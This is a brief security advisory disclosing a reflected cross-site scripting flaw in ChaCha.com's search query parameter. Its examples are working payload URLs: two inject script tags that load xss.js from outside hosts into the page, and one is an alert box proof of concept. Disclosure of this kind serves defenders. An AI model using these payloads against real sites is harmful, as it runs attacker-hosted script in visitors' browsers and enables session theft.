The ChaCha.com search functionality suffers from a cross site scripting vulnerability.
96ff97ef2ffceb4d5d77a8122900f48e3a0907da45e93270552d8ed9ba0b8af1
[+] ChaCha.com Search ?query= Cross-Site Scripting Vulnerability
[+] Author: d3hydr8
[+] Contact: d3hydr8[at]gmail[dot]com
[+] Original Post:
http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=275
[+] Vendor Site: http://www.chacha.com/
[+] Class: Input Validation Error
[+] Overview: The first search engine that uses the brainpower of really
smart people
to find anything you want on the Internet. Here's how you use it
[+] Example:
1.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=
http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E
2.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC=
http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
3
.http://search.chacha.com/search/query?query=<SCRIPT>alert("XSS");//<</SCRIPT>